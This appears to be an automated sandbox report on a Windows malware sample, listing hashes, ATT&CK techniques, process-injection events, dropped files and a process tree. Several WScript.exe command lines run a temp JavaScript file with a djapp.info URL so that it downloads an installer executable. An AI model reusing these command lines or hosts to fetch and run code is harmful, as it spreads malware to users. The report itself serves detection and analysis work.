525a6eec68dee499c5b10471a43c258b655f9b1ad806f177814d2ec717641ec8

Analysis

max time kernel
118s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
14/05/2024, 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe
Size

184KB
MD5

427e4f71aea2a7dae54914dd87754096
SHA1

8691dc37e47c79c8a670251e3753b0262506054d
SHA256

525a6eec68dee499c5b10471a43c258b655f9b1ad806f177814d2ec717641ec8
SHA512

8ca4b2de6f49346c65721e0c7195bdd73f48bac045c77636c4c62f33adec89219777db995ec9bd2d9ee513d216c69cb5c95de621946aadac0fc426c61c854a4f
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO36:/7BSH8zUB+nGESaaRvoB7FJNndnz

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	2272	WScript.exe
8	2272	WScript.exe
10	2272	WScript.exe
12	2544	WScript.exe
13	2544	WScript.exe
15	920	WScript.exe
16	920	WScript.exe
18	956	WScript.exe
19	956	WScript.exe
23	956	WScript.exe
26	2388	WScript.exe
27	2388	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 2272	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	28
PID 2072 wrote to memory of 2272	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	28
PID 2072 wrote to memory of 2272	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	28
PID 2072 wrote to memory of 2272	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	28
PID 2072 wrote to memory of 2544	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	30
PID 2072 wrote to memory of 2544	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	30
PID 2072 wrote to memory of 2544	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	30
PID 2072 wrote to memory of 2544	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	30
PID 2072 wrote to memory of 920	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	32
PID 2072 wrote to memory of 920	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	32
PID 2072 wrote to memory of 920	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	32
PID 2072 wrote to memory of 920	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	32
PID 2072 wrote to memory of 956	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	36
PID 2072 wrote to memory of 956	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	36
PID 2072 wrote to memory of 956	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	36
PID 2072 wrote to memory of 956	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	36
PID 2072 wrote to memory of 2388	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	38
PID 2072 wrote to memory of 2388	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	38
PID 2072 wrote to memory of 2388	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	38
PID 2072 wrote to memory of 2388	2072	427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\427e4f71aea2a7dae54914dd87754096_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf91B5.js" http://www.djapp.info/?domain=WapfUUzdLp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf91B5.exe
  2⤵
  - Blocklisted process makes network request
  PID:2272
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf91B5.js" http://www.djapp.info/?domain=WapfUUzdLp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf91B5.exe
  2⤵
  - Blocklisted process makes network request
  PID:2544
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf91B5.js" http://www.djapp.info/?domain=WapfUUzdLp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf91B5.exe
  2⤵
  - Blocklisted process makes network request
  PID:920
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf91B5.js" http://www.djapp.info/?domain=WapfUUzdLp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf91B5.exe
  2⤵
  - Blocklisted process makes network request
  PID:956
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf91B5.js" http://www.djapp.info/?domain=WapfUUzdLp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf91B5.exe
  2⤵
  - Blocklisted process makes network request
  PID:2388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
377b0b955dd0b0490e7beca59ae633a5

SHA1
a861cdd741b460d5fbda5452d31a5e507da50c06

SHA256
50e3cb37250fc0daf7672d7bc608ea0471916b2a31d102c5a6c48b0a086bbe7b

SHA512
3ccfdf2f239c66517b6134d51ff52481c5d9c4df22db49556b0073f0aec89c53354988ae5217272beffa6adbaffeded34b7230cbd5a0569d20be076157e61225

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
74e8fb35332b07d306fef75cadd95cd4

SHA1
01288dff94d580581d1c3420836250c5e47c4879

SHA256
3eea15daf00d0351d3b3024e9e649445b0797fc0d737522ef3edfdd5e7cee77f

SHA512
658a1e48defd963375a27d8131d017ef1f9fd0f355764b57015d8ae66f56897661e016457b2dc77c8ccede18ecefd0c280d6d63e535f57c2c57199169e2e23a3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
13cb1df36bd081cedb7addbd8a670b00

SHA1
67a9004ef4959ed6fd450229a15e42153c58bd8b

SHA256
220e2204de2bfb582a7f3e25d8d132e74e261c5eca60f5758686ecc5569cd108

SHA512
4c7871364ba5d3b1d34a894cd4b74204b4c6e133e6f28cf5dd1b5e77da6725b7ec615c758f345dc73e8a0a7e6fbd490b1231d39bb0534d9da654a5661ba851fb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
8b8f6fd1e770caa341e5e8181d1b97aa

SHA1
f985013ac65cc7562ffdd634d9e6fddcd2e3080a

SHA256
49f181d148fdb5edfc20dc22b8914a935af31ff84e2ab4748805384096cb9ce8

SHA512
36d7de61f7d6f20740f25a62557e55a596e29a00714430ba216ca6b87a86ad12799f88db9e5b33d26f27fd3090d5c326c1981e0bd44893718f6e97d2869cbcea

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
268feeec97f64a6d1912ca34ddef2d68

SHA1
92653c6d5e1705e4e5d296a6c38a8efea206123b

SHA256
9cc1c83d9041c0e97fc175a07f38d6cb8a593a15b1f4cd59fffc64ec06542eff

SHA512
97f68da4f9be69a64b97d27febae781e92099a23ac208a028df88b52208bc4669b457d4d3b76f2464b2fc2fb27700e9e76711164d106609819bd6a1868f26b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
648d4c16f86a295580be7244ac7a6a77

SHA1
2af4b9b1522956f4b4a036602063eb90a8f418c7

SHA256
3297ac55afb14dd58569ed9e84ec86f78bf9051948f62383aaba0c30a4b8d7b2

SHA512
69ecf0c233a08d8679706a178675843a8bc9bcf248225966fea67a17133aac045bd0e3e0efe7c4f4df35def2223a82d1c8e7d0da211a074c9312653477d0989b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
40KB

MD5
874d24887d788df2e0c3ddccb1ab2899

SHA1
dac7c1ad8cfbf340660179a7ed7dd7111babdf5a

SHA256
c1d535f86c262cb35e83e4c3a19c712ee1d79b9b4cbb4e9e0e2faddc882c98f6

SHA512
397a30c1861093a2cc601ab7a38930cf51947e471bd032adefdc382e2317d086f08be3b30a72768c9082ee5c77144979d7bb1a20a3fff41a57bcdcfbf928f739

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
4bda7380e6d72e046b561eeb78693bef

SHA1
bc5e270e078424aeff25ea69d474b7e2f117d43d

SHA256
60a4a6f3a02084018b55ac1fdf6cf5d697a537f4da0cf402e0199c48d84302d5

SHA512
71bcc05d942e0550f1dc0a14dd2b9a82f6386fab61f2d96502bd757623440f99db214459518bb3d3b7a7cdcec32b6c9ef2bcdc6f302f3f9c731d405371586744

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
c194a525218730f716b39b8f874d7809

SHA1
5d60c5340fd313c74ae38081c8dc38b5f37a38f6

SHA256
05f5ae30ed4fa41d6c7037a6ea1e5df196b921d033ae7274c7b342b078717701

SHA512
aad67edc7e13adea6c3b46584bcc44a58b8c9f8ecbe5cae6b287aa53f20a812af6edbdc6d430e0aa667d72866054b1e85ec069a042b48f0257b4d6dab25225e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabDAE4.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarFF37.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf91B5.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BSGONHVC.txt

Filesize
175B

MD5
6a6ddd22bb0e230d6c8b0e1eaf67b218

SHA1
9772ba079aa27841a54a69f502f49fa88d97a4d9

SHA256
6b1d9110bf34f27ffb3e5a9f95f7d824c333573d414490e1f2f536aed3f64a17

SHA512
9935d8359bebc8c2b97491957c118e63945ff4524e35e9c8d6fc761b10702aeb0e658c9455f6dfb82f38a37d713af09a1766f6d3e831aec4d4b4ef589d22def8

Download Submit